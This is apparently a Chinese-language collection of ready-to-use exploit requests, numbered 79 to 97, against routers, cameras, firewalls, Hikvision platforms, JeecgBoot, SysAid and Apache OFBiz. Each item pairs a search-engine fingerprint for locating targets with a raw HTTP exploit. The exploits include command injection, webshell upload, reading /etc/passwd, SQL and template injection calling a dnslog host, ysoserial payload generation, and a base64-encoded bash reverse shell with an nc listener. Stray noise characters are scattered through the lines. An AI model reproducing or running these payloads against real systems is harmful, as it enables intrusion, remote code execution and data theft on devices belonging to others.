0 Q' W; t$ K) ?, f% Z6 M, V7 A8 bContent-Length: 336: v, V: @& v! b' K( Y! Y
Accept-Encoding: gzip2 \% G0 S; ]& E9 N) U
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 F/ {% `$ A+ N
+ _0 C9 l# f; k7 B; w( |
------YsOxWxSvj1KyZow1PTsh98fdu6l
7 H$ ?! u1 M1 n, c- X; b; X, LContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt". g( \$ Q' I1 Z9 R# ?
Content-Type: image/png$ G$ T+ T% L5 i
: S6 c4 t1 K. y( j( R1 ?
YsOxWxSvj1KyZow1PTsh98fdu6l
$ T9 n, x# }) J8 g------YsOxWxSvj1KyZow1PTsh98fdu6l
& T0 H5 y' i3 U3 V7 J! vContent-Disposition: form-data; name="target": _# [$ F. D- ~2 O" X- r% n! X4 ~9 Q
/ X: _2 {0 s" t! j8 C
/Applications/SkillDevelopAndEHS/
( H3 W$ h& B* O) d------YsOxWxSvj1KyZow1PTsh98fdu6l--/ B: n: y8 b# o9 d

4 u( _; O; {( X5 L: j' n
8 f6 `0 U+ O* ]$ MGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
1 P2 o3 O; o8 o2 G" {4 k# i( H1 GHost: x.x.x.x8 p4 u$ a# F' I' a% u
8 x1 q' Z$ ^  U' p  E0 \6 R
8 b& h6 M7 }4 f; l3 b8 D$ `, ^
79. BYTEVALUE 百为流控路由器远程命令执行
3 m! r, U7 {, I. E1 I7 m; o  O2 }: Q; uFOFA:BYTEVALUE 智能流控路由器6 X. i+ t( [  E( d
GET /goform/webRead/open/?path=|id HTTP/1.1
6 J5 _6 d- k: _Host:IP& W/ v; h) [; b' c4 r; l5 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
. A, l0 Z! {( k* @0 s9 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) X) m! c% L) `  v& z, E) c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# u3 H4 B  N- i* V
Accept-Encoding: gzip, deflate! k* L$ ~7 R6 Y
Connection: close
! b7 u( n+ V" Z( A  |) c/ pUpgrade-Insecure-Requests: 1
+ z" I' O2 Z5 A+ ^: L; n
. c- C7 F( s/ \. Y  G3 c$ z& L5 C" m  Y: D% L, l0 Q
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 u, c! U0 w/ y
FOFA:app="速达软件-公司产品"9 Q7 A, D" D& X# A9 H" w; f9 @
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
9 B  ]" A; N5 o3 w. e) G( \. r/ KHost: x.x.x.x
# q( g8 C6 j: Z4 {0 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 f/ ?, a; U8 ~; GContent-Length: 27* D' E% o6 y, ^  p0 r9 I' I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 Y+ g1 x7 P7 ?/ sAccept-Encoding: gzip, deflate
+ C8 E- \; d; U- E; wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- q5 I( M/ d# _! {# X
Connection: close3 J3 _8 w; O! ]
Content-Type: application/octet-stream
# P; j0 K+ k9 A/ x0 Q2 w9 z: UUpgrade-Insecure-Requests: 1" N7 l+ m) R' F3 u3 C' _' t9 V9 M

- r3 K  ]/ Y% X) `4 N<% out.print("oessqeonylzaf");%>
8 r5 [5 i& Q6 z# Z( h2 U1 a  k  G- A- Z
2 J1 Z/ r" B, m) D& ~. g8 I
GET /xykqmfxpoas.jsp HTTP/1.1
  `+ F" ~  X  C. iHost: x.x.x.x8 r5 w# X+ W# w' q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% v% \, y5 z) n9 ?
Connection: close
" E3 u$ V* ?8 {- xAccept-Encoding: gzip
# V5 V( N# o3 n9 F: _  I3 |! [
: `: f  {3 ^1 M- }5 `2 y
8 Y8 Y0 G! |9 h' n81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& M6 B% M/ {6 ]3 k$ e* \8 U
FOFA:app="uniview-视频监控"
) A% `( i2 b1 w5 a3 C/ t7 DGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1% A) D. ?+ u  ~/ u
Host: x.x.x.x
) O* w1 B/ M+ n0 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% H) q* c7 _1 ZConnection: close9 y7 B7 W1 d% D$ `" H
Accept-Encoding: gzip6 @6 d8 l0 w5 k) y

/ d: L: `* h; M) Q9 M* O. M+ G) C0 K: Y% k# G- J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行/ x# o' M) e8 L5 }
FOFA:app="思福迪-LOGBASE"7 t9 k) b3 g4 n
POST /bhost/test_qrcode_b HTTP/1.1
/ R, \* r. }0 x" F0 NHost: BaseURL
" I- p6 b$ x& D' z! r1 KUser-Agent: Go-http-client/1.1: [3 H9 b! n9 H+ e. z( H
Content-Length: 23
) N/ r5 C& q+ Y1 nAccept-Encoding: gzip
& k# F5 i# \, R" bConnection: close
4 ]- [8 m1 v2 a* hContent-Type: application/x-www-form-urlencoded; }' Y8 r! m0 R7 G0 n7 b2 ?7 `
Referer: BaseURL. ^3 F: ^& x2 k4 |

, j& I% h3 I4 {7 Y4 _z1=1&z2="|id;"&z3=bhost3 x1 m! o, W- Z& q  r: O

9 f; w( a5 [  O7 A" _! ?
2 Q8 a* ~. Q% h83. JeecgBoot testConnection 远程命令执行
8 E7 D2 [" F+ l6 B4 y4 C% KFOFA:title=="JeecgBoot 企业级低代码平台": x; M4 R2 Q; d1 K$ }: I0 A

# ?0 J1 F6 G( L6 X5 H. a& ^( `& G5 A  @. @* @8 H
POST /jmreport/testConnection HTTP/1.1
# L9 Z' L: ?* {/ U! ^: w% q5 tHost: x.x.x.x/ J4 I; J8 D) H" |  S2 h- g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 n0 b% v5 R8 e8 o/ |Connection: close
& [% K1 C+ X" r7 M7 a+ g( AContent-Length: 8881$ r3 m1 g" _0 T8 r
Accept-Encoding: gzip2 u* S* \+ `% \' M1 h
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
/ ]; ]; e; g; C4 [( tContent-Type: application/json
; L) T. U4 t+ S2 t/ z! p4 j" C( j4 }" L$ c7 ?1 ?
PAYLOAD& H) D) \. ?' R# e

: ^5 u" I& Y' I84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
  J& o: F7 z+ s& X, L; R  gFOFA:title=="JeecgBoot 企业级低代码平台"
7 v4 d$ X6 x& q8 _' [  i( C/ h  V7 n2 n& p6 ?' w2 e
+ Z% W& y( r2 Q  U; I- q$ ]
1 r: T0 i& j( Z9 W0 w, H, g
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
2 F5 r: E4 l6 f! i* j3 [. KHost: 192.168.40.130:8080
. t, F& P% p; `, B( _2 N( zUser-Agent: curl/7.88.16 t2 I" s, \2 B! h/ C2 u
Content-Length: 1567 O$ s# ]& U1 y% n" ]5 O  X
Accept: */*
8 |* \  n# P) X& TConnection: close
) |! K* F" X0 _% V: vContent-Type: application/json
( w6 {9 G$ \! DAccept-Encoding: gzip: d( W# C- V4 g( N7 {/ D  S1 U

, U& @( b% v0 e4 `/ \  w{
' j% }2 i/ s5 ]( F6 k8 a2 M7 w( O "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",2 i0 j  p! ?; s% h7 _+ F4 Z
  "type": "0"
( K0 S) X" o# S- C8 ?& N: i* b}
" P. ^# s2 h8 W# |6 y2 Z9 k2 V$ Q/ y. D- e2 x
6 b9 ~3 r4 D% `# ?: `/ k$ }
85. SysAid On-premise< 23.3.36远程代码执行9 k9 [2 T7 m/ L4 ]$ i* _8 G
CVE-2023-47246! g) q% B! g* `. Q. N1 m% C
FOFA:body="sysaid-logo-dark-green.png"
1 V( S- X8 t6 O' R# i$ nEXP数据包如下,注入哥斯拉马8 [. b( P# K* r8 P8 t2 i5 x
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.19 ~. Z* B& o3 g7 K( k
Host: x.x.x.x
* K6 y: t5 r. i0 p: h, l! b7 w5 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: s6 N6 m- F1 G4 aContent-Type: application/octet-stream
  N. g  [# h2 j2 gAccept-Encoding: gzip
* U, }, n. |% @" R/ L  v7 C
4 @  Q8 I& c8 @8 R8 \7 DPAYLOAD. H2 {' f( `; ^$ R% g8 g! B: X
0 [( C; e- f$ ]+ W# v# }2 Z. t
回显URL:http://x.x.x.x/userfiles/index.jsp
9 s2 A; a, O4 s' E# ?- G# p: ]6 c& N7 h, X
86. 日本tosei自助洗衣机RCE
4 @- R/ v5 u: {7 W: y& BFOFA:body="tosei_login_check.php"- b4 h9 W! }) d7 x, u0 l
POST /cgi-bin/network_test.php HTTP/1.1
5 ?: j, I6 k$ Z* KHost: x.x.x.x
# v5 ?# P7 Y* k: w% y2 XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# U# b7 k* B" d
Connection: close
4 z+ S& @1 O/ E9 u( c/ Q: z3 UContent-Length: 44
8 b2 w/ D2 n" o" HAccept: */*& E! `! Z2 J8 M7 y, z  n# c
Accept-Encoding: gzip
1 D. }  q& D7 K' _8 u+ f9 @0 b8 i7 S; }) jAccept-Language: en
  Z- a/ R: d. @5 i  CContent-Type: application/x-www-form-urlencoded
! ]1 ]) _$ e  B8 V, K; K+ X( _
( X0 v$ C  B; T! [3 |& bhost=%0acat${IFS}/etc/passwd%0a&command=ping
3 |% W. |6 y. w+ X, w; _1 W) n6 H( V! [( ^/ \

' h# J1 E0 {0 n) f. A87. 安恒明御安全网关aaa_local_web_preview文件上传& A! ]; R% G3 J
FOFA:title="明御安全网关"
4 J" C0 V0 V" r& |5 [, kPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
& p! U& T$ `0 L# X& DHost: X.X.X.X
$ T  p  S9 z1 z+ h, [2 u2 W8 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ {6 G9 n5 I2 G8 R* c+ u7 aConnection: close. Z3 A' W" J8 s& R2 q
Content-Length: 198
7 [/ ]* L* I6 f/ g* ?: lAccept-Encoding: gzip
1 O1 W7 X$ k2 y7 g/ ~8 m, s/ yContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
! a* u5 u( A7 r* n( H6 c1 t( n6 ^& N: t/ E
--qqobiandqgawlxodfiisporjwravxtvd( e" S/ ~7 g) N# j
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
; S7 I. }) n  R* x  e0 S9 D! p" p4 c3 D5 A- jContent-Type: text/plain" S& w  A9 X0 I1 Y* q) |/ C/ C5 [
- ]! [" R: ~7 }2 y$ L; g
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
2 c9 w. `9 ^2 {--qqobiandqgawlxodfiisporjwravxtvd--9 J) ^' x0 y& V6 e9 }  M6 s+ B9 k

4 T" y5 c  M3 L' [7 l# @, z" O1 r. {2 s7 J& t; P' M. _
/jfhatuwe.php" t+ q- h  Q0 N0 W- s4 q

: I, R! j5 X. h9 O- p88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' S+ K: [& I6 P) N1 [FOFA:title="明御安全网关"
* [+ e+ l$ z' S% {GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1; b( H4 {( X& t9 ~$ t3 E3 {
Host: x.x.x.xx.x.x.x- p1 \( M7 K# [4 a2 p  ?# C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 g' S/ p% e- l. c* a4 l! s+ iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ W& _9 k1 c, a. k( }' @& xAccept-Encoding: gzip, deflate
/ d5 {5 Z1 X* n' kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; U$ q2 Y. H! H( G  aConnection: close. Z% X0 D$ l. H) k

% n8 q0 p1 P% n2 e+ k, L
6 H0 H5 L3 D  s' l$ k' d/astdfkhl.php
0 {8 u4 L8 ?$ G9 }  O/ t( I8 k
+ v# a$ o. _" \6 p89. 致远互联FE协作办公平台editflow_manager存在sql注入& c/ P& ~& ]/ [! @7 z+ ~+ r# s
FOFA:title="FE协作办公平台" || body="li_plugins_download", g9 O9 g2 ?6 M: S; y3 Z9 r
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
. g$ |  \* l" i; E+ P! W% bHost: x.x.x.x& {, x5 Y  Y1 Z$ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 E: }! n: A: ?
Connection: close
. F% {5 g, ^0 U8 y9 ?# O, x& z( i3 QContent-Length: 41
( [+ r: j- e! u4 Q- K8 A, i8 ^Content-Type: application/x-www-form-urlencoded
, s; a+ R2 _* s9 g; s, kAccept-Encoding: gzip
9 \9 k; P9 d/ R6 G$ T9 U) G: v; E; X+ {$ @8 \& X
option=2&GUID=-1'+union+select+111*222--+5 M) _3 f( k3 J: P
- i# n. g8 c6 k( U( c1 r+ I
) h0 W' C$ _2 U& X
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行/ W/ m' e$ y4 Y) J( W8 l
FOFA:icon_hash="-1830859634"6 o, T+ F; F" X! l# Q9 L/ p
POST /php/ping.php HTTP/1.1
% G2 Y- }' A1 ]' ^# t% \4 kHost: x.x.x.x( J) i2 {+ K4 V- @: e6 W5 u3 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
, m' \- V7 m7 B$ J: F! x. E4 _+ iContent-Length: 51. H6 e1 w$ t5 Z! T! V
Accept: application/json, text/javascript, */*; q=0.01
: [4 Z! Y$ e! D: X' ZAccept-Encoding: gzip, deflate
. A, ^- |9 g. C- p1 V. IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 U4 W$ a( ]1 Q! d* IConnection: close
, ?* y, v& z. r9 UContent-Type: application/x-www-form-urlencoded. ?3 K3 L# S; X: K& L
X-Requested-With: XMLHttpRequest, z3 M' d# `" U5 q/ |- o

2 v1 S" y+ o. u; x% O# F1 zjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
$ k$ L+ m# h2 D4 A$ ~0 A; q3 K2 F2 L' ]1 R$ I& N
: o% Z$ u/ t1 @4 c7 A. c
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取" g+ ^: m% ^; u, j: @
FOFA:title="综合安防管理平台"
0 p( |( a7 ?) `GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1+ Q! {, M) Z# r3 z4 A4 i4 {. s7 _
Host: your-ip. H: C$ o& P3 U4 R- |8 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 k9 }  [" v/ q9 `; Y6 V$ J
Accept-Encoding: gzip, deflate
6 K( G* ^* M- t" A0 e6 P6 i6 i/ pAccept: */*0 {- x8 y1 q; t) U
Connection: keep-alive. V. q; ]- h/ ^3 g# ~

7 G. Z( I7 z% |
+ K3 Q9 ^3 r' h  K4 |' O3 s
; {- g( a) m3 D8 R2 ~: c* V92. 海康威视运行管理中心session命令执行
1 h9 \3 c) \6 i5 NFastjson命令执行
0 i; t9 }+ ~. @; A7 Z4 b6 @+ Thunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
+ y& l; V! x: ~3 W6 C& t) qPOST /center/api/session HTTP/1.1
: ~. T; m$ K+ w# w: b! UHost:5 ?  F$ N* P, _- X% W
Accept: application/json, text/plain, */*2 u+ Y, d6 D; D# C0 c& J2 S
Accept-Encoding: gzip, deflate1 I- ~$ _. B1 P& X
X-Requested-With: XMLHttpRequest* F) `+ h. J/ J: _! h7 ~' Q
Content-Type: application/json;charset=UTF-83 R9 b6 X9 G0 Y# Q
X-Language-Type: zh_CN# d$ x+ q- o' J) z4 A! C4 o+ i% E
Testcmd: echo test! U0 L$ V: M- E1 n2 w1 ^) b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36/ J9 ^- m' N3 D% i. A( A( Y! T
Accept-Language: zh-CN,zh;q=0.9
5 X. f- P5 T2 ]- I! LContent-Length: 5778
; s5 p* [$ u& ~8 l5 s2 H1 G: x" `6 [
PAYLOAD" d# M. C; a. }8 A  n
' _( [/ G& M% I# I+ s0 X
0 z5 J4 M0 b& ~0 R1 w- e7 @
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
7 G9 D- h" g8 Q& l! QFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ j# N7 Z  a+ F/ I% `' h7 b6 c! Z
POST /?g=app_av_import_save HTTP/1.1& g# }: h6 h* _, F' }
Host: x.x.x.x/ B4 R% g/ R0 |6 g& ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx0 D6 d4 V! J5 u3 y  C  x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 [  y3 `; M! h
' q4 P3 m  E' P/ y9 v------WebKitFormBoundarykcbkgdfx
6 c- t( D' c. c  NContent-Disposition: form-data; name="MAX_FILE_SIZE". G! z  ?, {' d! H: O$ f' Z

3 m& ^1 T) r4 U' y5 @) W10000000" ^: y( a$ y: Q# O+ ?; ?9 _
------WebKitFormBoundarykcbkgdfx
* k& Y% _  x7 R$ h" ^Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"; m" q. i* M$ j6 r
Content-Type: text/plain6 R; a% d, u/ ^/ p6 n! i6 J

& w, e! U: D; K2 swagletqrkwrddkthtulxsqrphulnknxa
/ s/ I! K8 Y+ w; X% N9 t: V------WebKitFormBoundarykcbkgdfx
4 m8 D( O1 I9 H' t: [+ A. T3 ZContent-Disposition: form-data; name="submit_post"
% r; v5 L) w* r1 G; b4 w# J5 w! k. ~6 h
obj_app_upfile
; A* p  y; @3 k8 f------WebKitFormBoundarykcbkgdfx
. U3 p2 q2 w6 Z- b* a& V' h& JContent-Disposition: form-data; name="__hash__"
9 m2 L" U2 W; E# v. n
6 `0 m1 F3 O2 }7 H2 g/ t0b9d6b1ab7479ab69d9f71b05e0e9445
9 S) j" o7 ?8 S- r5 ?  F------WebKitFormBoundarykcbkgdfx--8 e8 T: S/ w2 j8 p, ^. _

5 Z" u' i, [- J( q% P4 r9 ]  h) D
/ |  _9 a' d1 sGET /attachements/xlskxknxa.txt HTTP/1.1: g9 ?/ k4 k3 v6 z
Host: xx.xx.xx.xx
# _  M4 O# ~6 @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: U- q* \* q8 O2 {( X  Y
* I( \( }! u3 ?! {- @, p6 B# Y% M
* Z7 y5 H' x  R4 V- I+ ^7 z94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 U' T, |- H1 v6 j8 o) d# Z
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 K( M+ X1 q/ B4 a8 ]' |- ]
POST /?g=obj_area_import_save HTTP/1.1
, P6 s$ {- N5 GHost: x.x.x.x8 O2 a7 v& R% p, l% W) }+ }+ L. C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
% ~1 \1 {1 c! e: }4 n( N( G! yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# D0 w6 R9 j0 @+ j
" Z" s/ s- {2 K7 [1 z- O* |% }------WebKitFormBoundarybqvzqvmt
% l& A, F  g5 K% d$ O& D& kContent-Disposition: form-data; name="MAX_FILE_SIZE"
6 q: {" S( G: U( y' ]; D
- j1 q- L5 W+ a; j10000000
" ?' r3 z- s" P& z------WebKitFormBoundarybqvzqvmt1 S2 b" g4 z+ y
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
: p4 B: j5 c( S+ g3 zContent-Type: text/plain
6 k  @) n4 N' A9 D7 F# p! F3 N, M4 [2 m: V. P
pxplitttsrjnyoafavcajwkvhxindhmu
' u" Z9 `9 k  J" H7 ~0 C------WebKitFormBoundarybqvzqvmt
$ C% s& S6 P' \( P- Y6 f# j7 p/ H% A- NContent-Disposition: form-data; name="submit_post"
# b) T. o4 H$ k1 O& X. U: |3 u. Y+ O  H
obj_app_upfile
3 G$ X* A" h$ Y" o------WebKitFormBoundarybqvzqvmt) ]" w; ~4 B2 v) C0 k
Content-Disposition: form-data; name="__hash__"
, B) B% N. t4 y
3 r4 K3 r. y7 a( i0b9d6b1ab7479ab69d9f71b05e0e9445
; `, S2 Q( K* H1 o6 C------WebKitFormBoundarybqvzqvmt--/ Z( m! l8 r+ {' s2 `' p0 s

) q" T3 P0 m4 d" M; g9 j, P, m1 n) M9 `5 P, K

7 N9 z. Y- [$ Z6 VGET /attachements/xlskxknxa.txt HTTP/1.1
3 F/ B, |# ~  Z6 N6 `# ]Host: xx.xx.xx.xx
  L# ?2 O- A" z# R* {# @- hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% b; J2 W, h1 D/ B7 \& e6 s
' q4 c) F1 a/ D4 K

* m! i7 ?1 Q. N: D
- w2 e9 `# t8 R8 [95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 f; u' L- L, Z% i7 f( G7 d
CVE-2023-49070: ?* Z7 {5 V( k3 L/ Y1 ]  s
FOFA:app="Apache_OFBiz"
' T4 d8 \" U7 A/ ]7 j% qPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
8 U1 }/ F1 }* X8 N8 @Host: x.x.x.x
% Z8 b6 t# v1 {  h# g: HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& ~- Z9 ]" W* a: l8 h
Connection: close: V5 B; s0 z& S1 v6 \
Content-Length: 889; w; \9 O) d" ?/ g, R
Content-Type: application/xml$ l  [4 Y. q! P4 s2 l
Accept-Encoding: gzip
  e+ E) T  n/ J$ ~/ X5 D% q& m: S: Y' t1 l- K+ t8 `( A; R
<?xml version="1.0"?>
3 D1 E/ X4 S* f. w& I$ h<methodCall>8 I+ W$ E# }  ~  d" \, p; S
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
# {! u, N+ F5 c/ i5 |  a    <params>5 a1 @% i" h# I/ m5 n8 b  M
      <param>/ _+ H2 t! r. \' y" E6 V: T2 F5 n
      <value>
( W2 K6 j' Y1 s! j: g- ]3 |        <struct>' T2 y0 u* M6 S
       <member>
, h1 P/ r- y* f# D( Y, n, H          <name>test</name>
' w& o+ U) P. w8 h, W' C2 k          <value>
% b# o% B  C6 U      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
$ B  C/ y1 s; H% y1 f# y          </value>
( d7 O$ x+ T- x9 L8 X        </member>
; K% e6 R7 P2 o, d      </struct>
: U% A0 M( R$ S% D6 J      </value>
5 N+ G3 }: Z8 h) |$ Z    </param>
) a' w) `9 h% U/ ]' j    </params>
2 j# W' _8 K* j# Z0 N, i</methodCall>
1 Y. I) s  n' ]6 ?5 c' m
- _$ g1 y0 M, @8 Z  [" q3 A% K  y* n' L8 m, p7 b
用ysoserial生成payload4 ~* w6 Y: O/ Q& m$ G6 u" w
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n". Y1 L) n3 ]$ p5 H2 e  `* `
; j4 X, u/ V# _; o( l" m  q2 A& E

) B" @# ]7 ]6 v, \7 P) J/ Z& w将生成的payload替换到上面的POC( z! |) r8 p* x9 p
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
! X1 z5 M) t8 _! CHost: 192.168.40.130:8443
2 Q/ }6 _' B5 s, DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- u* _' ^: R' A1 t3 K0 ~Connection: close8 d& Y! t3 H+ {+ H. i: |' H
Content-Length: 889
. e* m% v# W- r* R# t" s9 wContent-Type: application/xml
5 A* w1 g6 L& ~# b1 L. q+ WAccept-Encoding: gzip
$ D4 A8 d& Y' K  x
7 o' q4 q" M5 f0 RPAYLOAD
$ H/ I: Z7 o6 r! x4 Q+ M- ^( ]1 `4 {: @6 b- h
96. Apache OFBiz  18.12.11 groovy 远程代码执行
9 {1 r) b" r0 J( H8 H3 ?FOFA:app="Apache_OFBiz"
" A  g  g* a7 S6 `2 D4 G' o2 ]POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; r% Q/ [! O; d0 W
Host: localhost:8443
, T- O7 X" A6 b, y; O3 t$ `6 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; Z; q% p7 R6 ^% R# rAccept: */*' D/ i2 y" x' W$ e* W) U8 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- v' H2 _; J+ hContent-Type: application/x-www-form-urlencoded  w4 G, X9 B) y% A) A, T8 B, l
Content-Length: 553 G/ _4 {* [' M7 D
$ t" r$ O4 S+ }- z" {
groovyProgram=throw+new+Exception('id'.execute().text);7 b! X' f  T7 l% y" V' f
- k# V, v# R5 [- v; |+ s! S2 C
7 F: t4 `  l9 i2 d9 L. [2 v
反弹shell; f+ X* C  E  n; @
在kali上启动一个监听0 T+ z( a$ D8 j7 C' P0 F( X2 V
nc -lvp 7777
( o* c" K; P" Y8 ]* v+ d3 Q1 {8 Q, K! S; Z6 C: o- M1 S4 N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1. C" i- ^5 H2 z4 U1 y7 A
Host: 192.168.40.130:8443
8 L0 z  r1 h: A+ y* C) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 C) l: f: F3 ^7 T% U6 r; yAccept: */*/ \3 `9 `% S/ n7 O9 x2 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 n; }+ ~0 V; H( ~$ N$ d+ UContent-Type: application/x-www-form-urlencoded$ [" B1 O/ ?# Q6 ?( e! N: J. x) h. _
Content-Length: 71% T& c5 C) k9 `* n! V0 E5 k

. C8 a: r  `; a6 G3 S3 HgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();7 [  |$ `8 h& F' T; ?0 w  ]

% w' e; \6 H& W. A97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 V9 u# p$ ?$ w) M" k0 \FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
7 l, A% T0 ~) X8 B+ _$ VGET /passport/login/ HTTP/1.12 i% k2 P4 G: s7 B
Host: 192.168.40.130:8085* X2 |0 Z+ ?% C3 {$ a' Q
